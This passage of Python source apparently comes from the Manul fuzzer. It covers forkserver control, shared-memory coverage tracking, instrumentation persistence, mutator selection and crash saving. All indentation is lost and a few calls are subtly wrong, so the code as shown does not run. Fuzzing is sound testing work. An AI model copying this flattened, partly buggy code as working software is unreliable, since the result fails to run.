# This is the parent process
time.sleep(INIT_WAIT_TIME)
self.r_fd = os.fdopen(self.status[0], 'rb')
res = self.r_fd.read(4)
if len(res) != 4:
ERROR("Failed to init forkserver")
INFO(0, bcolors.OKGREEN, None, "Forkserver init completed successfully")
else:
# This is the child process
os.dup2(self.control[0], 198)
os.dup2(self.status[1], 199)
null_fds = [os.open(os.devnull, os.O_RDWR) for x in xrange(2)]
# put /dev/null fds on 1 and 2
os.dup2(null_fds[0], 1)
os.dup2(null_fds[1], 2)
cmd = cmd.split()
# TODO: we need to close some fds before we actually start execv
# more details: https://lcamtuf.blogspot.com/2014/10/fuzzing-binaries-without-execve.html
os.execv(cmd[0], cmd[0:])
ERROR("Failed to start the target using forkserver")
sys.exit(0) # this shouldn't be happen
def run_via_forkserver(self):
# TODO: timeouts for read/write otherwise we can wait infinitely
res = os.write(self.control[1], b"go_!") # ask forkserver to fork
if res != 4:
ERROR("Failed to communicate with forkserver (run_via_forkserver, write). Unable to send go command")
fork_pid = self.r_fd.read(4)
if len(fork_pid) != 4:
ERROR("Failed to communicate with forkserver (run_via_forkserver, read). Unable to confirm fork")
status = self.r_fd.read(4) # TODO: we need timeout here because our target can go idle
if len(status) != 4:
ERROR("Failed to communicate with forkserver (run_via_forkserver, read). Unable to retrieve child status")
return bytes_to_int(status)
class Command(object):
def __init__(self, target_ip, target_port, target_protocol, timeout, fokserver_on, dbi_persistence_handler,
dbi_persistence_mode):
self.process = None
self.forkserver_on = fokserver_on
self.forkserver_is_up = False
self.forkserver = None
self.returncode = 0
if self.forkserver_on:
self.forkserver = ForkServer(timeout)
self.out = None
self.err = None
self.timeout = timeout
if target_ip:
self.target_ip = target_ip
self.target_port = int(target_port)
self.target_protocol = target_protocol
self.net_class = None
self.dbi_persistence_on = dbi_persistence_handler
self.dbi_persistence_mode = dbi_persistence_mode
self.dbi_restart_target = True
def init_target_server(self, cmd):
global net_process_is_up
INFO(1, bcolors.BOLD, None, "Launching %s" % cmd)
if sys.platform == "win32":
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
preexec_fn=os.setsid)
if not is_alive(self.process.pid):
ERROR("Failed to start target server error code = %d, output = %s" % (self.process.returncode, self.process.stdout))
net_process_is_up = True
time.sleep(INIT_WAIT_TIME)
def net_send_data_to_target(self, data, net_cmd):
global net_process_is_up
if not net_process_is_up:
INFO(1, None, None, "Target network server is down, starting")
self.init_target_server(net_cmd)
self.net_class = manul_network.Network(self.target_ip, self.target_port, self.target_protocol)
if not net_process_is_up: # is it the first run ?
ERROR("The target network application is not started, aborting")
self.net_class.send_test_case(data)
time.sleep(net_sleep_between_cases)
if not is_alive(self.process.pid):
INFO(1, None, None, "Target is dead")
if sys.platform == "win32":
returncode = EXCEPTION_FIRST_CRITICAL_CODE # just take the first critical
else:
returncode = 11
net_process_is_up = False
self.net_class = None
return returncode, "[Manul message] Target is dead"
return 0, ""
def exec_command_forkserver(self, cmd):
if not self.forkserver_is_up:
self.forkserver.init_forkserver(cmd)
self.forkserver_is_up = True
status = self.forkserver.run_via_forkserver()
return status
def handle_dbi_pre(self):
res = self.dbi_persistence_on.recv_command()
if res == 'P':
# our target successfully reached the target function and is waiting for the next command
INFO(1, None, None, "Target successfully reached the target function (pre_handler)")
send_res = self.dbi_persistence_on.send_command('F') # notify the target that we received command
elif res == 'K' and self.dbi_persistence_mode == 2:
INFO(1, None, None, "Target successfully reached the target function (pre_loop_handler) for the first time")
send_res = self.dbi_persistence_on.send_command('P') # notify the target that we received command
elif res == 'Q':
INFO(1, None, None, "Target notified about exit (after post_handler in target)")
self.dbi_restart_target = True
return True
elif res == 'T': # TODO can it happen when we are sending command ?
self.dbi_restart_target = True
return True
else:
ERROR("Received wrong command from the instrumentation library (pre_handler): %s" % res)
return False
def handle_dbi_post(self):
res = self.dbi_persistence_on.recv_command()
if res == 'K':
INFO(1, None, None, "Target successfully exited from the target function (post_handler)")
elif res == 'T':
WARNING(None, "The target failed to answer within given timeframe, restarting")
self.dbi_restart_target = True
return 0
elif res == "":
WARNING(None, "No answer from the target, restarting.")
# the target should be restarted after this (it can be a crash)
self.dbi_restart_target = True
return 1
elif res == "C": # target sent crash signal, handling and restarting
self.dbi_restart_target = True
return 2
else:
ERROR("Received wrong command from the instrumentation library (post_handler)")
return 0
def exec_command_dbi_persistence(self, cmd):
if self.dbi_restart_target:
if self.process != None and is_alive(self.process.pid):
INFO(1, None, None, "Killing the target")
kill_all(self.process.pid)
self.dbi_persistence_on.close_ipc_object() # close if it is not a first run
self.dbi_persistence_on.setup_ipc_object()
if sys.platform == "win32":
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if not is_alive(self.process.pid):
ERROR("Failed to start the target error code = %d, output = %s" %
(self.process.returncode, self.process.stdout))
self.dbi_persistence_on.connect_pipe_win()
else:
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
preexec_fn=os.setsid)
if not is_alive(self.process.pid):
ERROR("Failed to start the target error code = %d, output = %s" %
(self.process.returncode, self.process.stdout))
INFO(1, None, None, "Target successfully started, waiting for result")
self.dbi_restart_target = False
if self.handle_dbi_pre():
# It means that the target issued quit command or we failed to send command, we should handle it properly
return 0, ""
if self.dbi_persistence_mode == 1:
res = self.handle_dbi_post()
if res == 1:
self.handle_return(1) # we use custom timeout of 5 seconds here to check if our target is still alive
return self.process.returncode, self.err
elif res == 2: # TODO: it is only for windows, make it consistent
return EXCEPTION_FIRST_CRITICAL_CODE, "Segmentation fault"
else:
ERROR("Persistence mode not yet supported")
return 0, ""
def handle_return(self, default_timeout):
INFO(1, None, None, "Requesting target state")
if PY3:
try:
self.out, self.err = self.process.communicate(timeout=default_timeout)
except subprocess.TimeoutExpired:
INFO(1, None, None, "Timeout occured")
kill_all(self.process.pid)
return False
else:
self.out, self.err = self.process.communicate() # watchdog will handle timeout if needed in PY2
INFO(1, None, None, "State %s %s" % (self.out, self.err))
return True
def exec_command(self, cmd):
if self.forkserver_on:
self.returncode = self.exec_command_forkserver(cmd)
self.err = ""
return
if self.dbi_persistence_on:
INFO(1, None, None, "Persistence mode")
self.returncode, self.err = self.exec_command_dbi_persistence(cmd)
return
if sys.platform == "win32":
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
self.process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
preexec_fn=os.setsid)
INFO(1, None, None, "Target successfully started, waiting for result")
self.handle_return(self.timeout)
def run(self, cmd):
self.exec_command(cmd)
if isinstance(self.err, (bytes, bytearray)):
self.err = self.err.decode("utf-8", 'replace')
if self.forkserver_on or self.dbi_persistence_on:
return self.returncode, self.err
return self.process.returncode, self.err
class Fuzzer:
def __init__(self, list_of_files, fuzzer_id, virgin_bits_global, args, stats_array, restore_session, crash_bits,
dbi_setup, radamsa_path):
# local fuzzer config
INFO(1, None, None, "Performing intialization of fuzzer %d" % fuzzer_id)
global SHM_SIZE, net_sleep_between_cases
self.SHM_SIZE = SHM_SIZE
self.CALIBRATIONS_COUNT = 7
self.SHM_ENV_VAR = "__AFL_SHM_ID"
self.deterministic = args.deterministic_seed
if self.deterministic:
random.seed(a=self.fuzzer_id)
self.dbi = args.dbi
self.afl_fuzzer = dict()
self.radamsa_path = radamsa_path
if "linux" in sys.platform and "radamsa:0" not in args.mutator_weights:
self.radamsa_fuzzer = radamsa.RadamsaFuzzer(RAND(MAX_SEED))
self.radamsa_fuzzer.load_library(self.radamsa_path)
else:
self.radamsa_fuzzer = None
self.token_dict = list()
self.timeout = args.timeout
self.disable_volatile_bytes = args.disable_volatile_bytes
net_sleep_between_cases = float(args.net_sleep_between_cases)
self.user_mutators = dict()
self.mutator_weights = OrderedDict()
total_weights = 0
try:
weights = args.mutator_weights.split(",")
for weight in weights:
name, weight = weight.split(":")
total_weights += int(weight)
self.mutator_weights[name] = total_weights
except:
ERROR("Invalid format for mutator_weights string, check manul.config file")
if total_weights != 10:
ERROR("Weights in mutator_weights should have 10 in sum, check manul.config file")
try:
if args.dict:
fd = open(args.dict, 'r')
content = fd.readlines()
fd.close()
for line in content:
line = line.replace("\n", "")
if line.startswith("#") or line == "":
continue
line = bytearray(line, "utf-8")
self.token_dict.append(line)
except:
WARNING(None, "Failed to parse dictionary file, dictionary is in invalid format or not accessible")
self.current_file_name = None
self.prev_hashes = dict() # used to store hash of coverage bitmap for each file
for file_name in list_of_files:
self.prev_hashes[file_name] = None
self.cmd_fuzzing = args.cmd_fuzzing
if args.user_signals:
self.user_defined_signals = args.user_signals.split(",")
else:
self.user_defined_signals = None
self.dbi_pipe_handler = None
if dbi_setup:
self.dbi_engine_path = dbi_setup[0]
self.dbi_tool_path = dbi_setup[1]
self.dbi_tool_params = dbi_setup[2]
if args.dbi_persistence_mode >= 1:
INFO(1, None, None, "Getting PIPE name for fuzzer %d" % fuzzer_id)
self.dbi_pipe_handler = dbi_mode.IPCObjectHandler(self.timeout)
obj_name = self.dbi_pipe_handler.get_ipc_obj_name()
INFO(1, None, None, "IPC object name in %s" % (obj_name))
self.dbi_tool_params += "-ipc_obj_name %s" % (obj_name)
self.target_ip = None
self.target_port = None
self.target_protocol = None
if args.target_ip_port:
self.target_ip = args.target_ip_port.split(':')[0]
self.target_port = args.target_ip_port.split(':')[1]
self.target_protocol = args.target_protocol
self.list_of_files = list_of_files
self.fuzzer_id = fuzzer_id
self.virgin_bits = list()
self.virgin_bits = [0xFF] * SHM_SIZE
self.global_map = virgin_bits_global
self.crash_bits = crash_bits # happens not too often
self.bitmap_size = 0
self.avg_bitmap_size = 0
self.avg_exec_per_sec = 0
self.stats_array = stats_array
self.restore = restore_session
# creating output dir structure
self.output_path = args.output + "/%d" % fuzzer_id
self.queue_path = self.output_path + "/queue"
if not args.custom_path:
self.mutate_file_path = self.output_path + "/mutations"
else:
self.mutate_file_path = args.custom_path
self.crashes_path = self.output_path + "/crashes"
self.unique_crashes_path = self.crashes_path + "/unique"
self.enable_logging = args.logging_enable
self.log_file = None
self.user_sync_freq = args.sync_freq
self.sync_bitmap_freq = -1
if not self.restore:
try:
os.mkdir(self.output_path)
except:
ERROR("Failed to create required output dir structure (unique dir)")
try:
os.mkdir(self.queue_path)
except:
ERROR("Failed to create required output dir structure (queue)")
try:
os.mkdir(self.crashes_path)
except:
ERROR("Failed to create required output dir structure (crashes)")
try:
os.mkdir(self.unique_crashes_path)
except:
ERROR("Failed to create required output dir structure (unique crashes)")
if not args.custom_path:
try:
os.mkdir(self.mutate_file_path)
except:
ERROR("Failed to create output directory for mutated files")
self.is_dumb_mode = args.simple_mode
self.input_path = args.input
self.target_binary_path = args.target_binary # and its arguments
self.fuzzer_stats = FuzzerStats()
self.stats_file = None
self.disable_save_stats = args.no_stats
if not self.is_dumb_mode:
self.trace_bits = self.setup_shm()
for i in range(0, self.SHM_SIZE):
if self.virgin_bits[i] != 0xFF:
self.global_map[i] = self.virgin_bits[i]
elif self.global_map[i] != 0xFF and self.virgin_bits[i] == 0xFF:
self.virgin_bits[i] = self.global_map[i]
if self.restore:
if not isfile(self.output_path + "/fuzzer_stats"):
ERROR("Fuzzer stats file doesn't exist. Make sure your output is actual working dir of manul")
self.stats_file = open(self.output_path + "/fuzzer_stats", 'r')
content = self.stats_file.readlines()
line = None
for line in content: # getting last line from file to restore session
pass
if line is None:
ERROR("Failed to restore fuzzer %d from stats. Invalid fuzzer_stats format" % self.fuzzer_id)
last = line[:-2] # skipping last symbol space and \n
INFO(0, None, None, "Restoring last stats %s" % last)
self.stats_file.close()
bitmap = None
if not self.is_dumb_mode:
self.bitmap_file = open(self.output_path + "/fuzzer_bitmap", "rb")
bitmap = self.bitmap_file.read()
self.bitmap_file.close()
self.restore_session(last, bitmap)
if not self.disable_save_stats:
self.stats_file = open(self.output_path + "/fuzzer_stats", 'a+')
self.bitmap_file = open(self.output_path + "/fuzzer_bitmap", 'wb')
if self.enable_logging:
self.log_file = open(self.output_path + "/fuzzer_log", 'a')
self.init_mutators()
self.net_cmd = False
if self.target_ip:
self.net_cmd = self.prepare_cmd_to_run(None, True)
self.forkserver_on = args.forkserver_on
INFO(1, None, None, "Initalization is done for %d" % fuzzer_id)
self.command = Command(self.target_ip, self.target_port, self.target_protocol, self.timeout, args.forkserver_on,
self.dbi_pipe_handler, args.dbi_persistence_mode)
def sync_bitmap(self):
self.sync_bitmap_freq += 1
if (self.sync_bitmap_freq % self.user_sync_freq) != 0:
return
if self.is_dumb_mode:
return
for i in range(0, self.SHM_SIZE):
if self.virgin_bits[i] != 0xFF:
self.global_map[i] = self.virgin_bits[i]
elif self.global_map[i] != 0xFF and self.virgin_bits[i] == 0xFF:
self.virgin_bits[i] = self.global_map[i]
def restore_session(self, last, bitmap):
# parse previously saved stats line
last = last.split(" ")[1:] # cut timestamp
for index, stat in enumerate(last):
stat = float(stat.split(":")[1]) # taking actual value
if PY3:
stat_name = list(self.fuzzer_stats.stats.items())[index][0]
else:
stat_name = self.fuzzer_stats.stats.items()[index][0]
self.fuzzer_stats.stats[stat_name] = stat
if bitmap:
# restoring and synchronizing bitmap
'''for i in range(0, SHM_SIZE):
self.virgin_bits[i] = bitmap[i]
self.sync_bitmap_freq = self.user_sync_freq # little trick to enable synchronization
self.sync_bitmap()
self.sync_bitmap_freq = 0'''
# restoring queue
final_list_of_files = list()
new_files = [f for f in os.listdir(self.queue_path) if os.path.isfile(os.path.join(self.queue_path, f))]
for file_name in new_files:
final_list_of_files.append((1, file_name)) # this is how we add new files
self.list_of_files = self.list_of_files + final_list_of_files
if self.deterministic: # skip already seen seeds
for i in range(0, self.fuzzer_stats.stats['executions']):
random.seed(seed=self.fuzzer_id)
def save_stats(self):
if self.stats_file is None:
return
self.stats_file.write(str(time.time()) + " ")
for index, (k,v) in enumerate(self.fuzzer_stats.stats.items()):
self.stats_file.write("%d:%.2f " % (index, v))
self.stats_file.write("\n")
self.stats_file.flush()
# saving AFL state
for file_name in self.list_of_files:
if not isinstance(file_name, string_types) : file_name = file_name[1]
self.afl_fuzzer[file_name].save_state(self.output_path)
def prepare_cmd_to_run(self, target_file_path, is_net):
if self.dbi:
dbi_tool_opt = "-c"
if self.dbi == "pin":
dbi_tool_opt = "-t"
binary_path = "".join(self.target_binary_path)
if self.cmd_fuzzing:
target_file_path = extract_content(target_file_path) # now it is the file content
if not is_net:
binary_path = binary_path.replace("@@", target_file_path)
final_string = "%s %s %s %s -- %s" % (self.dbi_engine_path, dbi_tool_opt, self.dbi_tool_path,
self.dbi_tool_params, binary_path)
else:
final_string = "".join(self.target_binary_path)
if self.cmd_fuzzing:
target_file_path = extract_content(target_file_path) # now it is the file content
target_file_path = target_file_path.decode("utf-8", "replace")
target_file_path = target_file_path.replace('\x00', '')
max_length = os.sysconf('SC_ARG_MAX') - len(final_string) - 3 # the last 2 is @@
target_file_path = target_file_path[:max_length]
if not is_net:
final_string = final_string.replace("@@", target_file_path)
return final_string
def setup_shm_win(self):
from ctypes.wintypes import DWORD, HANDLE, LPCWSTR, LPVOID
FILE_MAP_ALL_ACCESS = 0xF001F
PAGE_READWRITE = 0x04
sh_name = "%s_%s" % (str(int(round(time.time()))), self.fuzzer_id)
szName = c_wchar_p(sh_name)
kernel32_dll = windll.kernel32
create_file_mapping_func = kernel32_dll.CreateFileMappingW
create_file_mapping_func.argtypes = (HANDLE, LPVOID, DWORD, DWORD, DWORD, LPCWSTR)
create_file_mapping_func.restype = HANDLE
map_view_of_file_func = kernel32_dll.MapViewOfFile
map_view_of_file_func.restype = LPVOID
hMapObject = create_file_mapping_func(-1, None,
PAGE_READWRITE, 0, self.SHM_SIZE,
szName)
if not hMapObject or hMapObject == 0:
ERROR("Could not open file mapping object, GetLastError = %d" % GetLastError())
pBuf = map_view_of_file_func(hMapObject, FILE_MAP_ALL_ACCESS, 0, 0,
self.SHM_SIZE)
if not pBuf or pBuf == 0:
ERROR("Could not map view of file, GetLastError = %d" % GetLastError())
INFO(0, None, self.log_file, "Setting up shared mem %s for fuzzer:%d" % (sh_name,
self.fuzzer_id))
os.environ[self.SHM_ENV_VAR] = sh_name
return pBuf
def setup_shm(self):
if sys.platform == "win32":
return self.setup_shm_win()
IPC_PRIVATE = 0
try:
rt = CDLL('librt.so')
except:
rt = CDLL('librt.so.1')
shmget = rt.shmget
shmget.argtypes = [c_int, c_size_t, c_int]
shmget.restype = c_int
shmat = rt.shmat
shmat.argtypes = [c_int, POINTER(c_void_p), c_int]
shmat.restype = c_void_p#POINTER(c_byte * self.SHM_SIZE)
shmid = shmget(IPC_PRIVATE, self.SHM_SIZE, 0o666)
if shmid < 0:
ERROR("shmget() failed")
addr = shmat(shmid, None, 0)
INFO(0, None, self.log_file, "Setting up shared mem %d for fuzzer:%d" % (shmid, self.fuzzer_id))
os.environ[self.SHM_ENV_VAR] = str(shmid)
return addr
def init_mutators(self):
INFO(0, bcolors.BOLD + bcolors.HEADER, self.log_file, "Initializing mutators")
for module_name in self.mutator_weights:
if "afl" == module_name or "radamsa" == module_name:
continue
try:
self.user_mutators[module_name] = importlib.import_module(module_name)
except ImportError as exc:
ERROR("Unable to load user provided mutator %s. %s" % (module_name, exc.message))
self.user_mutators[module_name].init()
# init AFL fuzzer state
for file_name in self.list_of_files:
if not isinstance(file_name, string_types): file_name = file_name[1]
self.afl_fuzzer[file_name] = afl_fuzz.AFLFuzzer(self.token_dict, self.queue_path, file_name) #assign AFL for each file
if self.restore:
self.afl_fuzzer[file_name].restore_state(self.output_path)
def dry_run(self):
INFO(0, bcolors.BOLD + bcolors.HEADER, self.log_file, "Performing dry run")
useless = 0
for file_name in self.list_of_files:
# if we have tuple and not string here it means that this file was found during execution and located in queue
self.current_file_name = file_name
if not isinstance(file_name, string_types):
file_name = file_name[1]
full_input_file_path = self.queue_path + "/" + file_name
else:
full_input_file_path = self.input_path + "/" + file_name
shutil.copy(full_input_file_path, self.mutate_file_path + "/.cur_input")
full_input_file_path = self.mutate_file_path + "/.cur_input"
memset(self.trace_bits, 0x0, SHM_SIZE)
if self.target_ip:
err_code, err_output = self.command.net_send_data_to_target(extract_content(full_input_file_path), self.net_cmd)
else:
cmd = self.prepare_cmd_to_run(full_input_file_path, False)
INFO(1, bcolors.BOLD, self.log_file, "Launching %s" % cmd)
err_code, err_output = self.command.run(cmd)
if err_code and err_code != 0:
INFO(1, None, self.log_file, "Initial input file: %s triggers an exception in the target" % file_name)
if self.is_critical(err_output, err_code):
WARNING(self.log_file, "Initial input %s leads target to crash (did you disable leak sanitizer?). "
"Enable --debug to check actual output" % file_name)
INFO(1, None, self.log_file, err_output)
elif self.is_problem_with_config(err_code, err_output):
WARNING(self.log_file, "Problematic file %s" % file_name)
trace_bits_as_str = string_at(self.trace_bits, SHM_SIZE)
# count non-zero bytes just to check that instrumentation actually works
non_zeros = [x for x in trace_bits_as_str if x != 0x0]
if len(non_zeros) == 0:
INFO(1, None, self.log_file, "Output from target %s" % err_output)
if "is for the wrong architecture" in err_output:
ERROR("You should run 32-bit drrun for 32-bit targets and 64-bit drrun for 64-bit targets")
ERROR("%s doesn't cover any path in the target, Make sure the binary is actually instrumented" % file_name)
ret = self.has_new_bits(trace_bits_as_str, True, list(), self.virgin_bits, False, full_input_file_path)
if ret == 0:
useless += 1
WARNING(self.log_file, "Test %s might be useless because it doesn't cover new paths in the target, consider removing it" % file_name)
else:
self.sync_bitmap()
if useless != 0:
WARNING(self.log_file, "%d out of %d initial files are useless" % (useless, len(self.list_of_files)))
INFO(0, bcolors.BOLD + bcolors.OKBLUE, self.log_file, "Dry run finished")
self.fuzzer_stats.stats['executions'] += 1.0
self.update_stats()
def has_new_bits(self, trace_bits_as_str, update_virgin_bits, volatile_bytes, bitmap_to_compare, calibration, full_input_file_path):
ret = 0
#print_bitmaps(bitmap_to_compare, trace_bits_as_str, full_input_file_path)
if not calibration:
hash_current = zlib.crc32(trace_bits_as_str) & 0xFFFFFFFF
if not isinstance(self.current_file_name, string_types):
self.current_file_name = self.current_file_name[1]
prev_hash = self.prev_hashes.get(self.current_file_name, None)
if prev_hash and hash_current == prev_hash:
return 0
self.prev_hashes[self.current_file_name] = hash_current
for j in range(0, SHM_SIZE):
if j in volatile_bytes:
continue # ignoring volatile bytes
if PY3:
trace_byte = trace_bits_as_str[j] # optimize it and compare by 4-8 bytes or even use xmm0?
else:
trace_byte = ord(trace_bits_as_str[j]) # self.trace_bits.contents[j])#
if not trace_byte:
continue
virgin_byte = bitmap_to_compare[j]
if trace_byte and (trace_byte & virgin_byte):
if ret < 2:
if virgin_byte == 0xff:
ret = 2 # new path discovered
if update_virgin_bits:
self.bitmap_size += 1
else:
ret = 1 # new hit of existent paths
virgin_byte = virgin_byte & ~trace_byte
if update_virgin_bits:
bitmap_to_compare[j] = virgin_byte # python will handle potential synchronization issues
return ret
def calibrate_test_case(self, full_file_path):
volatile_bytes = list()
trace_bits_as_str = string_at(self.trace_bits, self.SHM_SIZE) # this is how we read memory in Python
bitmap_to_compare = list("\x00" * self.SHM_SIZE)
for i in range(0, self.SHM_SIZE):
if PY3:
bitmap_to_compare[i] = trace_bits_as_str[i]
else:
bitmap_to_compare[i] = ord(trace_bits_as_str[i])
cmd, data = None, None
if self.target_ip: # in net mode we only need data
data = extract_content(full_file_path)
else:
cmd = self.prepare_cmd_to_run(full_file_path, False)
for i in range(0, self.CALIBRATIONS_COUNT):
INFO(1, None, self.log_file, "Calibrating %s %d" % (full_file_path, i))
memset(self.trace_bits, 0x0, SHM_SIZE)
if self.target_ip: # in net mode we only need data
err_code, err_output = self.command.net_send_data_to_target(data, self.net_cmd)
else:
INFO(1, None, self.log_file, cmd)
if self.cmd_fuzzing:
try:
err_code, err_output = self.command.run(cmd)
except OSError as e:
if e.errno == 7:
WARNING(self.log_file, "Failed to send this input over command line into the target, input too long")
continue
else:
ERROR("Failed to execute command, error:", e)
else:
err_code, err_output = self.command.run(cmd)
if err_code and err_code > 0:
INFO(1, None, self.log_file, "Target raised exception during calibration for %s" % full_file_path)
trace_bits_as_str = string_at(self.trace_bits, SHM_SIZE) # this is how we read memory in Python
if not self.disable_volatile_bytes:
for j in range(0, SHM_SIZE):
if PY3:
trace_byte = trace_bits_as_str[j]
else:
trace_byte = ord(trace_bits_as_str[j])
if trace_byte != bitmap_to_compare[j]:
if j not in volatile_bytes:
volatile_bytes.append(j) # mark offset of this byte as volatile
INFO(1, None, self.log_file, "We have %d volatile bytes for this new finding" % len(volatile_bytes))
# let's try to check for new coverage ignoring volatile bytes
self.fuzzer_stats.stats['blacklisted_paths'] = len(volatile_bytes)
return self.has_new_bits(trace_bits_as_str, True, volatile_bytes, self.virgin_bits, True, full_file_path)
def update_stats(self):
for i, (k,v) in enumerate(self.fuzzer_stats.stats.items()):
self.stats_array[i] = v
def is_problem_with_config(self, exc_code, err_output):
if (exc_code == 127 or exc_code == 126) and not self.cmd_fuzzing: # command not found or permissions
ERROR("Thread %d unable to execute target. Bash return %s" % (self.fuzzer_id, err_output))
elif exc_code == 124: # timeout
WARNING(self.log_file, "Target failed to finish execution within given timeout, try to increase default timeout")
return True
return False
def generate_new_name(self, file_name):
iteration = int(round(self.fuzzer_stats.stats['executions']))
if file_name.startswith("manul"): # manul-DateTime-FuzzerId-iteration_original.name
base_name = file_name[file_name.find("_")+1:]
file_name = base_name
now = int(round(time.time()))
return "manul-%d-%d-%d_%s" % (now, self.fuzzer_id, iteration, file_name)
def is_critical_win(self, exception_code):
if exception_code == STATUS_CONTROL_C_EXIT:
return False
if exception_code >= EXCEPTION_FIRST_CRITICAL_CODE and exception_code < EXCEPTION_LAST_CRITICAL_CODE:
return True
return False
def is_critical_mac(self, exception_code):
if exception_code in critical_signals_nix:
return True
return False
def is_critifcal_linux(self, exception_code):
if exception_code in critical_signals_nix:
return True
if self.forkserver_on and os.WIFSIGNALED(exception_code):
return True
return False
def is_critical(self, err_str, err_code):
if err_str and "Sanitizer" in err_str or "SIGSEGV" in err_str or "Segmentation fault" in err_str or \
"core dumped" in err_str or "floating point exception" in err_str:
return True
if self.user_defined_signals and err_code in self.user_defined_signals:
return True
if sys.platform == "win32":
return self.is_critical_win(err_code)
elif sys.platform == "darwin":
return self.is_critical_mac(err_code)
else: # looks like Linux
return self.is_critifcal_linux(err_code)
def mutate_radamsa(self, full_input_file_path, full_output_file_path):
if "linux" in sys.platform: # on Linux we just use a shared library to speed up test cases generation
data = extract_content(full_input_file_path)
data_new = self.radamsa_fuzzer.radamsa_generate_output(bytes(data))
save_content(data_new, full_output_file_path)
return 0
new_seed_str = ""
if self.deterministic:
new_seed = random.randint(0, sys.maxsize)
new_seed_str = "--seed %d " % new_seed
cmd = "%s %s%s > %s" % (self.radamsa_path, new_seed_str, full_input_file_path, full_output_file_path)
INFO(1, None, self.log_file, "Running %s" % cmd)
try:
subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True) # generate new input
except subprocess.CalledProcessError as exc:
WARNING(self.log_file,
"Fuzzer %d failed to generate new input from %s due to some problem with radamsa. Error code %d. Return msg %s" %
(self.fuzzer_id, full_input_file_path, exc.returncode, exc.output))
return 1
return 0
def mutate_afl(self, file_name, full_input_file_path, full_output_file_path):
data = extract_content(full_input_file_path)
res = self.afl_fuzzer[file_name].mutate(data, self.list_of_files,
self.fuzzer_stats.stats['exec_per_sec'],
self.avg_exec_per_sec, self.bitmap_size,
self.avg_bitmap_size, 0) # TODO: handicap
if not res:
WARNING(self.log_file, "Unable to mutate data provided using afl")
return 1
if len(data) <= 0:
WARNING(self.log_file, "AFL produced empty file for %s", full_input_file_path)
save_content(data, full_output_file_path)
return 0
def mutate_input(self, file_name, full_input_file_path, full_output_file_path):
execution = self.fuzzer_stats.stats['executions'] % 10
for name in self.mutator_weights:
weight = self.mutator_weights[name]
if execution < weight and name == "afl":
return self.mutate_afl(file_name, full_input_file_path, full_output_file_path)
elif execution < weight and name == "radamsa":
return self.mutate_radamsa(full_input_file_path, full_output_file_path)
elif execution < weight:
mutator = self.user_mutators.get(name, None)
if not mutator:
ERROR("Unable to load user provided mutator %s at mutate_input stage" % name)
data = extract_content(full_input_file_path)
data = mutator.mutate(data)
if not data:
ERROR("No data returned from user provided mutator. Exciting.")
save_content(data, full_output_file_path)
return 0
else:
continue
def run(self):
if not self.is_dumb_mode:
self.dry_run()
last_stats_saved_time = 0
if self.restore:
INFO(0, bcolors.BOLD + bcolors.OKBLUE, self.log_file, "Session successfully restored")
start_time = timer()
cycle_id = 0
while True: # never return
new_files = list() # empty the list
elapsed = 0
cycle_id += 1
for i, file_name in enumerate(self.list_of_files):
self.current_file_name = file_name
crash_found = False
self.fuzzer_stats.stats['file_running'] = i
full_input_file_path = self.input_path + "/"
# if we have tuple and not string here it means that this file was found during execution and located in queue
if not isinstance(file_name, string_types):
file_name = file_name[1]
full_input_file_path = self.queue_path + "/"
full_input_file_path += file_name
if not self.is_dumb_mode:
memset(self.trace_bits, 0x0, SHM_SIZE) # preparing our bitmap for new run
mutated_name = ".cur_input"
full_output_file_path = self.mutate_file_path + "/" + mutated_name
# command to generate new input using one of selected mutators
res = self.mutate_input(file_name, full_input_file_path, full_output_file_path)
if res != 0:
ERROR("Fuzzer %d failed to generate and save new input on disk" % self.fuzzer_id)
timer_start = timer()
if self.target_ip:
data = extract_content(full_output_file_path)
exc_code, err_output = self.command.net_send_data_to_target(data, self.net_cmd)
else:
cmd = self.prepare_cmd_to_run(full_output_file_path, False)
first_iteration = False
INFO(1, None, self.log_file, "Running %s" % cmd)
if self.cmd_fuzzing:
try:
exc_code, err_output = self.command.run(cmd)
except OSError as e:
if e.errno == 7:
WARNING(self.log_file, "Failed to send this input over command line into the target, input too long")
continue
else:
ERROR("Failed to execute command, error:", e)
else:
exc_code, err_output = self.command.run(cmd)
self.fuzzer_stats.stats['executions'] += 1.0
elapsed += (timer() - timer_start)
if exc_code and exc_code != 0:
self.fuzzer_stats.stats['exceptions'] += 1
INFO(1, None, self.log_file, "Target raised exception and returns 0x%x error code" % (exc_code))
if self.is_critical(err_output, exc_code):
INFO(0, bcolors.BOLD + bcolors.OKGREEN, self.log_file, "New crash found by fuzzer %d" % self.fuzzer_id)
self.fuzzer_stats.stats["last_crash_time"] = time.time()
new_name = self.generate_new_name(file_name)
shutil.copy(full_output_file_path, self.crashes_path + "/" + new_name) # copying into crash folder
self.fuzzer_stats.stats['crashes'] += 1
if not self.is_dumb_mode:
trace_bits_as_str = string_at(self.trace_bits, SHM_SIZE) # this is how we read memory in Python
ret = self.has_new_bits(trace_bits_as_str, True, list(), self.crash_bits, False, full_output_file_path)
if ret == 2:
INFO(0, bcolors.BOLD + bcolors.OKGREEN, self.log_file, "Crash is unique")
self.fuzzer_stats.stats['unique_crashes'] += 1
shutil.copy(full_output_file_path, self.unique_crashes_path + "/" + new_name) # copying into crash folder with unique crashes
crash_found = True
elif self.is_problem_with_config(exc_code, err_output):
WARNING(self.log_file, "Problematic file: %s" % file_name)
if not crash_found and not self.is_dumb_mode:
# Reading the coverage
trace_bits_as_str = string_at(self.trace_bits, SHM_SIZE) # this is how we read memory in Python
# we are not ready to update coverage at this stage due to volatile bytes
ret = self.has_new_bits(trace_bits_as_str, False, list(), self.virgin_bits, False, full_output_file_path)
if ret == 2:
INFO(1, None, self.log_file, "Input %s produces new coverage, calibrating" % file_name)
if self.calibrate_test_case(full_output_file_path) == 2:
self.fuzzer_stats.stats['new_paths'] += 1
self.fuzzer_stats.stats['last_path_time'] = time.time()
INFO(1, None, self.log_file, "Calibration finished successfully. Saving new finding")
